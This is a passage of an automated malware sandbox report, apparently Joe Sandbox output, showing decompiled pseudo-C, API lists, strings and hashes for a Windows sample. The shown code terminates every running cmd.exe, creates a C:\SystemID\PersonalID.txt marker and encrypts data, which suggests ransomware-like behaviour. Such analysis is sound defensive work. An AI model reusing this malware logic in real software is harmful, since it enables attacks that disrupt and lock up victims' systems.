0x0040ca10
0x0040ca14
0x0040ca18
0x0040ca1d
0x0040ca1d
0x0040ca22
0x0040ca29
0x0040ca30
0x0040ca33
0x0040ca36
0x0040ca36
0x00000000
0x0040ca10
0x0040c9b5
0x0040c9b8
0x0040c9b8
0x0040c9bc
0x0040c9c2
0x0040c9be
0x0040c9be
0x0040c9be
0x0040c9c4
0x0040c9c5
0x0040c9c6
0x0040c9cb
0x0040c9ce
0x0040c9d1
0x0040c9d1
0x0040c9d5
0x00000000
0x0040c9d5
0x0040c96a
0x0040c96c
0x00000000
0x00000000
0x0040c972
0x0040c976
0x00000000
0x00000000
0x0040c980
0x0040c984
0x0040c988
0x0040c98d
0x0040c98d
0x0040c992
0x0040c999
0x0040c9a0
0x0040c9a3
0x0040c9a6
0x00000000
0x0040c9aa
0x0040c920
0x0040c92c
0x0040c933
0x0040c93b
0x00000000
0x00000000
0x0040c93d
0x0040c942
0x00000000
0x00000000
0x00000000
0x0040c942
0x00000000
0x0040c920
0x0040c799
0x0040c79e
0x0040c7a1
0x0040c7a3
0x0040c906
0x0040c906
0x0040c909
0x0040c90e
0x00000000
0x0040c7b0
0x0040c7b0
0x0040c7b0
0x0040c7b9
0x0040c7bb
0x0040c7bc
0x0040c7c1
0x0040c7c6
0x00000000
0x00000000
0x0040c7ce
0x0040c7d5
0x0040c7dc
0x0040c7e7
0x0040c7ed
0x0040c7f3
0x0040c7f6
0x0040c7f6
0x0040c7f9
0x0040c7fc
0x0040c7fc
0x0040c801
0x0040c801
0x0040c803
0x00000000
0x0040c7e9
0x0040c7e9
0x0040c805
0x0040c805
0x0040c80d
0x0040c810
0x0040c815
0x0040c818
0x0040c81e
0x0040c861
0x0040c863
0x0040c869
0x0040c86e
0x0040c871
0x0040c871
0x0040c874
0x0040c876
0x0040c87a
0x0040c881
0x0040c888
0x0040c88b
0x0040c88f
0x0040c8ac
0x0040c8ae
0x0040c891
0x0040c894
0x0040c894
0x0040c895
0x0040c89f
0x0040c8a4
0x0040c8a4
0x0040c895
0x0040c8b8
0x0040c8be
0x0040c8c1
0x0040c8c3
0x0040c8ca
0x0040c8d1
0x0040c8d1
0x0040c824
0x0040c82b
0x0040c82f
0x0040c837
0x0040c83c
0x0040c842
0x0040c847
0x0040c84a
0x0040c84a
0x0040c850
0x0040c855
0x0040c85a
0x0040c85a
0x0040c855
0x0040c8d5
0x0040c8d8
0x0040c8e0
0x0040c8e3
0x0040c8e8
0x0040c8ed
0x0040c8ed
0x0040c8f0
0x0040c8f0
0x0040c8f3
0x0040c8f6
0x0040c8fb
0x0040c8fe
0x0040c8fe
0x00000000
0x0040c7b0

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00412440() {
				char _v524;
				long _v552;
				void* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t8;
				int _t11;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;

				_t18 = CreateToolhelp32Snapshot(0xf, 0);
				_v560 = 0x22c;
				_push( &_v560);
				_t8 = Process32FirstW(_t18);
				_t17 = CloseHandle;
				if(_t8 == 0) {
					L7:
					return CloseHandle(_t18);
				}
				_push(_t19);
				do {
					_t11 = E00420235(_t17, _t18, _t19,  &_v524, L"cmd.exe");
					_t21 = _t21 + 8;
					if(_t11 == 0) {
						_t19 = OpenProcess(1, _t11, _v552);
						if(_t19 != 0) {
							TerminateProcess(_t19, 9);
							CloseHandle(_t19);
						}
					}
				} while (Process32NextW(_t18,  &_v560) != 0);
				goto L7;
			}

0x00412455
0x00412457
0x00412467
0x00412469
0x0041246f
0x00412477
0x004124cc
0x004124d4
0x004124d4
0x00412479
0x00412480
0x0041248c
0x00412491
0x00412496
0x004124a7
0x004124ab
0x004124b0
0x004124b7
0x004124b7
0x004124ab
0x004124c7
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v56;
				intOrPtr _v60;
				signed int _v64;
				short _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v104;
				void* __ebx;
				void* __ebp;
				_Unknown_base(*)()* _t147;
				void* _t169;
				void* _t173;
				void* _t177;
				void* _t195;
				void* _t203;
				struct HINSTANCE__* _t221;
				signed int _t222;
				void* _t233;
				void* _t235;
				signed int _t238;
				short _t260;
				char _t261;
				intOrPtr _t266;
				void* _t267;
				void* _t268;
				void* _t269;

				_push(0xffffffff);
				_push(0x4caa98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t266;
				_t267 = _t266 - 0x58;
				_v8 = 0;
				_t221 = LoadLibraryW(L"Shell32.dll");
				if(_t221 != 0) {
					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
					_t259 = _t147;
					E00413A90(_t221,  &_v32, __edi, 0x400);
					_v8 = 1;
					_t254 = _v32;
					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi);
					_push(_v20);
					_v36 = 7;
					_v40 = 0;
					_v56 = 0;
					E00418400( &_v56, _v32, _v28);
					_v8 = 2;
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
					_v8 = 3;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t147, "/");
					_v8 = 4;
					E0040F2B0( &_v56,  &_v80,  &_v104);
					_t268 = _t267 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t268 = _t268 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t268 = _t268 + 4;
					}
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
					_v8 = 5;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t259, "/");
					_v8 = 6;
					E0040F2B0( &_a4,  &_v80,  &_v104);
					_t269 = _t268 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t269 = _t269 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t269 = _t269 + 4;
					}
					_t260 = _v56;
					_t167 =  >=  ? _t260 :  &_v56;
					_t233 =  >=  ? _t260 :  &_v56;
					_v20 =  >=  ? _t260 :  &_v56;
					_t250 =  >=  ? _t260 :  &_v56;
					_t169 = _t233 + _v40 * 2;
					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
					if(( >=  ? _t260 :  &_v56) != _t169) {
						_push(_t233);
						E00418380( &_v20, _t250, _t169, _v20);
						_t269 = _t269 + 0xc;
					}
					_t261 = _a4;
					_t171 =  >=  ? _t261 :  &_a4;
					_t235 =  >=  ? _t261 :  &_a4;
					_v20 =  >=  ? _t261 :  &_a4;
					_t252 =  >=  ? _t261 :  &_a4;
					_t173 = _t235 + _a20 * 2;
					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
					if(( >=  ? _t261 :  &_a4) != _t173) {
						_push(_t235);
						E00418380( &_v20, _t252, _t173, _v20);
						_t269 = _t269 + 0xc;
					}
					_t267 = _t269 - 8;
					_v20 = 0x5c;
					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
						_t262 = _t177;
						if( &_v56 != _t177) {
							if(_v36 >= 8) {
								L00422587(_v56);
								_t267 = _t267 + 4;
							}
							_v36 = 7;
							_v40 = 0;
							_v56 = 0;
							E004145A0( &_v56, _t262);
						}
						if(_v84 >= 8) {
							L00422587(_v104);
							_t267 = _t267 + 4;
						}
						_t238 = _v40;
						_t180 =  >=  ? _v56 :  &_v56;
						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
							_t97 = _t238 - 1; // -1
							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
							_t265 = _t203;
							if( &_v56 != _t203) {
								if(_v36 >= 8) {
									L00422587(_v56);
									_t267 = _t267 + 4;
								}
								_v36 = 7;
								_v40 = 0;
								_v56 = 0;
								E004145A0( &_v56, _t265);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						_t239 = _a20;
						_t182 =  >=  ? _a4 :  &_a4;
						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
							_t239 =  &_a4;
							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
							_t264 = _t195;
							if( &_a4 != _t195) {
								if(_a24 >= 8) {
									L00422587(_a4);
									_t267 = _t267 + 4;
								}
								_a24 = 7;
								_t239 =  &_a4;
								_a20 = 0;
								_a4 = 0;
								E004145A0( &_a4, _t264);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						FreeLibrary(_t221);
						_t185 =  >=  ? _a4 :  &_a4;
						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
					} else {
						FreeLibrary(_t221);
						_t222 = 0;
					}
					if(_v36 >= 8) {
						L00422587(_v56);
						_t267 = _t267 + 4;
					}
					_v36 = 7;
					_v56 = 0;
					_t188 = _v32;
					_v40 = 0;
					if(_v32 != 0) {
						L00422587(_t188);
						_t267 = _t267 + 4;
					}
					goto L41;
				} else {
					_t222 = 0;
					L41:
					if(_a24 >= 8) {
						L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t222;
				}
			}

0x0040f313
0x0040f315
0x0040f320
0x0040f321
0x0040f328
0x0040f331
0x0040f33e
0x0040f342
0x0040f353
0x0040f361
0x0040f363
0x0040f368
0x0040f36c
0x0040f378
0x0040f37a
0x0040f37f
0x0040f38c
0x0040f394
0x0040f398
0x0040f39d
0x0040f3a4
0x0040f3a8
0x0040f3b4
0x0040f3bb
0x0040f3bf
0x0040f3c4
0x0040f3cb
0x0040f3cf
0x0040f3db
0x0040f3e2
0x0040f3e6
0x0040f3ee
0x0040f3f9
0x0040f3fe
0x0040f405
0x0040f40a
0x0040f40f
0x0040f40f
0x0040f414
0x0040f41c
0x0040f423
0x0040f42a
0x0040f42e
0x0040f433
0x0040f438
0x0040f438
0x0040f43b
0x0040f43f
0x0040f44e
0x0040f455
0x0040f459
0x0040f45e
0x0040f465
0x0040f469
0x0040f475
0x0040f47c
0x0040f480
0x0040f488
0x0040f493
0x0040f498
0x0040f49f
0x0040f4a4
0x0040f4a9
0x0040f4a9
0x0040f4ae
0x0040f4b6
0x0040f4bd
0x0040f4c4
0x0040f4c8
0x0040f4cd
0x0040f4d2
0x0040f4d2
0x0040f4db
0x0040f4e7
0x0040f4ea
0x0040f4ed
0x0040f4f0
0x0040f4f6
0x0040f4f9
0x0040f4fb
0x0040f4fd
0x0040f505
0x0040f50a
0x0040f50a
0x0040f513
0x0040f51f
0x0040f522
0x0040f525
0x0040f528
0x0040f52e
0x0040f531
0x0040f533
0x0040f535
0x0040f53d
0x0040f542
0x0040f542
0x0040f545
0x0040f548
0x0040f55e
0x0040f578
0x0040f57d
0x0040f584
0x0040f58a
0x0040f58f
0x0040f594
0x0040f594
0x0040f599
0x0040f5a4
0x0040f5ab
0x0040f5af
0x0040f5af
0x0040f5b8
0x0040f5bd
0x0040f5c2
0x0040f5c2
0x0040f5cc
0x0040f5cf
0x0040f5d9
0x0040f5db
0x0040f5e8
0x0040f5ed
0x0040f5f4
0x0040f5fa
0x0040f5ff
0x0040f604
0x0040f604
0x0040f609
0x0040f614
0x0040f61b
0x0040f61f
0x0040f61f
0x0040f628
0x0040f62d
0x0040f632
0x0040f632
0x0040f628
0x0040f63c
0x0040f63f
0x0040f649
0x0040f655
0x0040f658
0x0040f65d
0x0040f664
0x0040f66a
0x0040f66f
0x0040f674
0x0040f674
0x0040f679
0x0040f681
0x0040f684
0x0040f68b
0x0040f68f
0x0040f68f
0x0040f698
0x0040f69d
0x0040f6a2
0x0040f6a2
0x0040f698
0x0040f6a6
0x0040f6b6
0x0040f6c9
0x0040f560
0x0040f561
0x0040f567
0x0040f567
0x0040f6d2
0x0040f6d7
0x0040f6dc
0x0040f6dc
0x0040f6e1
0x0040f6e8
0x0040f6ec
0x0040f6ef
0x0040f6f8
0x0040f6fb
0x0040f700
0x0040f700
0x00000000
0x0040f344
0x0040f344
0x0040f703
0x0040f707
0x0040f70c
0x0040f711
0x0040f71a
0x0040f724
0x0040f724

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

SHGetFolderPathW, xrefs: 0040F34D
Shell32.dll, xrefs: 0040F32C
\, xrefs: 0040F548

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v1124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t127;
				intOrPtr _t129;
				void* _t150;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t178;
				intOrPtr _t179;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				void* _t191;

				_push(0xffffffff);
				_push(0x4ca818);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t179;
				_push(_t150);
				_push(_t172);
				_v100 = __ecx;
				_push(0xffffffff);
				_v8 = 1;
				_push(0);
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E00413FF0(_t150,  &_v92,  &_a28);
				_v8 = 2;
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "\n");
				_v8 = 3;
				_push(3);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\\\n");
				_v8 = 4;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t181 = _t179 - 0x458 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t181 = _t181 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t181 = _t181 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, " ");
				_v8 = 5;
				_push(6);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "&#160;");
				_v8 = 6;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t182 = _t181 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t182 = _t182 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t182 = _t182 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "/");
				_v8 = 7;
				_push(2);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\/");
				_v8 = 8;
				_t171 =  &_v44;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t183 = _t182 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t183 = _t183 + 4;
				}
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t183 = _t183 + 4;
				}
				_v20 = E00451D30();
				E0044F960(_t150, _t171, E00452510());
				_t120 =  >=  ? _v92 :  &_v92;
				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
				E00452ED0(_t121,  &_v20, 0, 0);
				_t185 = _t183 + 0x1c;
				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
					__eflags = _a24 - 0x10;
					_t173 = _t127;
					_t165 =  >=  ? _a4 :  &_a4;
					_t129 = _a20 + 1;
					_push(4);
					_push(_v20);
					_push(_t176);
					_push( >=  ? _a4 :  &_a4);
					E004525F0(_t129);
					_t189 = _t185 + 0x20;
					_v96 = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						E0044F5E0(_t151);
						E00451A60(_t171, _t178, _v20);
						_t191 = _t189 + 8;
						 *_v100 = _v96;
					} else {
						E00451FB0(_t151, _t173);
						E00450670(E00450960(_t151, _t171, __eflags), _t173);
						_push(_t173);
						_push("Error encrypting message: %s\n");
						_push(E00420E4D() + 0x40);
						E00422408(_t151, _t173, _t176, __eflags);
						_t191 = _t189 + 0x14;
						_t176 = 0;
					}
				} else {
					E00450670(_t124,  &_v1124);
					_t191 = _t185 + 8;
					_t176 = 0;
				}
				if(_v72 >= 0x10) {
					L00422587(_v92);
					_t191 = _t191 + 4;
				}
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				if(_a24 >= 0x10) {
					L00422587(_a4);
					_t191 = _t191 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a48 >= 0x10) {
					L00422587(_a28);
				}
				 *[fs:0x0] = _v16;
				return _t176;
			}

0x0040cba3
0x0040cba5
0x0040cbb0
0x0040cbb1
0x0040cbbe
0x0040cbc0
0x0040cbc1
0x0040cbc4
0x0040cbc6
0x0040cbd0
0x0040cbd6
0x0040cbdd
0x0040cbe4
0x0040cbe8
0x0040cbed
0x0040cbf4
0x0040cbfb
0x0040cc02
0x0040cc09
0x0040cc0d
0x0040cc12
0x0040cc19
0x0040cc20
0x0040cc27
0x0040cc2e
0x0040cc32
0x0040cc3a
0x0040cc45
0x0040cc4a
0x0040cc51
0x0040cc56
0x0040cc5b
0x0040cc5b
0x0040cc5e
0x0040cc66
0x0040cc6d
0x0040cc74
0x0040cc78
0x0040cc7d
0x0040cc82
0x0040cc82
0x0040cc85
0x0040cc8f
0x0040cc96
0x0040cc9d
0x0040cca1
0x0040cca6
0x0040ccad
0x0040ccb4
0x0040ccbb
0x0040ccc2
0x0040ccc6
0x0040ccce
0x0040ccd9
0x0040ccde
0x0040cce5
0x0040ccea
0x0040ccef
0x0040ccef
0x0040ccf2
0x0040ccfa
0x0040cd01
0x0040cd08
0x0040cd0c
0x0040cd11
0x0040cd16
0x0040cd16
0x0040cd19
0x0040cd23
0x0040cd2a
0x0040cd31
0x0040cd35
0x0040cd3a
0x0040cd41
0x0040cd48
0x0040cd4f
0x0040cd56
0x0040cd5a
0x0040cd62
0x0040cd67
0x0040cd6d
0x0040cd72
0x0040cd79
0x0040cd7e
0x0040cd83
0x0040cd83
0x0040cd8a
0x0040cd91
0x0040cd98
0x0040cd9c
0x0040cda1
0x0040cda6
0x0040cda6
0x0040cdae
0x0040cdb7
0x0040cdc6
0x0040cdd5
0x0040cdde
0x0040cde3
0x0040cded
0x0040ce1a
0x0040ce21
0x0040ce2c
0x0040ce30
0x0040ce35
0x0040ce39
0x0040ce3a
0x0040ce3c
0x0040ce3f
0x0040ce40
0x0040ce42
0x0040ce47
0x0040ce4a
0x0040ce4d
0x0040ce50
0x0040ce82
0x0040ce8d
0x0040ce95
0x0040ce9b
0x0040ce52
0x0040ce52
0x0040ce5e
0x0040ce66
0x0040ce67
0x0040ce74
0x0040ce75
0x0040ce7a
0x0040ce7d
0x0040ce7d
0x0040cdef
0x0040cdf7
0x0040cdfc
0x0040cdff
0x0040cdff
0x0040cea1
0x0040cea6
0x0040ceab
0x0040ceab
0x0040ceb2
0x0040ceb9
0x0040cec0
0x0040cec4
0x0040cec9
0x0040cece
0x0040cece
0x0040ced5
0x0040cedc
0x0040cee3
0x0040cee7
0x0040ceec
0x0040cef1
0x0040cefb
0x0040cf06

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

Error encrypting message: %s, xrefs: 0040CE67
\\n, xrefs: 0040CC1B
 , xrefs: 0040CCAF

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
				void* __edi;
				intOrPtr _t12;
				void* _t13;
				char _t16;
				intOrPtr _t19;
				signed int _t22;
				char _t35;
				void* _t36;
				char* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t40;
				char* _t41;
				void* _t42;
				char* _t43;

				_t45 = __ebp;
				_t38 = __edx;
				_t34 = __ebx;
				_t40 = _a4;
				_t39 = _a8;
				 *_t39 = 0;
				if(_t40 == 0) {
					L26:
					return 1;
				} else {
					_t12 =  *_t40;
					if(_t12 == 0 || _t12 == 0xa) {
						goto L26;
					} else {
						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
						_t60 = _t13;
						if(_t13 == 0) {
							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
							if( *((char*)(_t40 + 0xb)) != 0x34) {
								goto L5;
							} else {
								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
								if( *((char*)(_t40 + 0xc)) != 0x2c) {
									goto L5;
								} else {
									_t41 = _t40 + 0xd;
									__eflags = E00448190(_t41, "ENCRYPTED", 9);
									if(__eflags == 0) {
										_t16 =  *_t41;
										__eflags = _t16 - 0xa;
										if(_t16 == 0xa) {
											L13:
											__eflags =  *_t41;
											if(__eflags != 0) {
												_t42 = _t41 + 1;
												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
												if(__eflags == 0) {
													_t43 = _t42 + 0xa;
													__eflags = _t43;
													_t37 = _t43;
													_push(_t34);
													while(1) {
														_t35 =  *_t43;
														__eflags = _t35 - 0x41;
														if(_t35 < 0x41) {
															goto L20;
														}
														__eflags = _t35 - 0x5a;
														if(_t35 <= 0x5a) {
															L22:
															_t43 = _t43 + 1;
															continue;
														}
														L20:
														__eflags = _t35 - 0x2d;
														if(_t35 == 0x2d) {
															goto L22;
														}
														_t6 = _t35 - 0x30; // -48
														__eflags = _t6 - 9;
														if(_t6 <= 9) {
															goto L22;
														}
														 *_t43 = 0;
														_t19 = E0047ECD0(_t37);
														 *_t39 = _t19;
														 *_t43 = _t35;
														_a4 = _t43 + 1;
														_pop(_t36);
														__eflags = _t19;
														if(__eflags != 0) {
															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
															asm("sbb eax, eax");
															return  ~( ~_t22);
														} else {
															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
															__eflags = 0;
															return 0;
														}
														goto L27;
													}
												} else {
													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
													__eflags = 0;
													return 0;
												}
											} else {
												goto L14;
											}
										} else {
											while(1) {
												__eflags = _t16;
												if(__eflags == 0) {
													break;
												}
												_t16 =  *((intOrPtr*)(_t41 + 1));
												_t41 = _t41 + 1;
												__eflags = _t16 - 0xa;
												if(_t16 != 0xa) {
													continue;
												} else {
													goto L13;
												}
												goto L27;
											}
											L14:
											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
											__eflags = 0;
											return 0;
										}
									} else {
										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
										__eflags = 0;
										return 0;
									}
								}
							}
						} else {
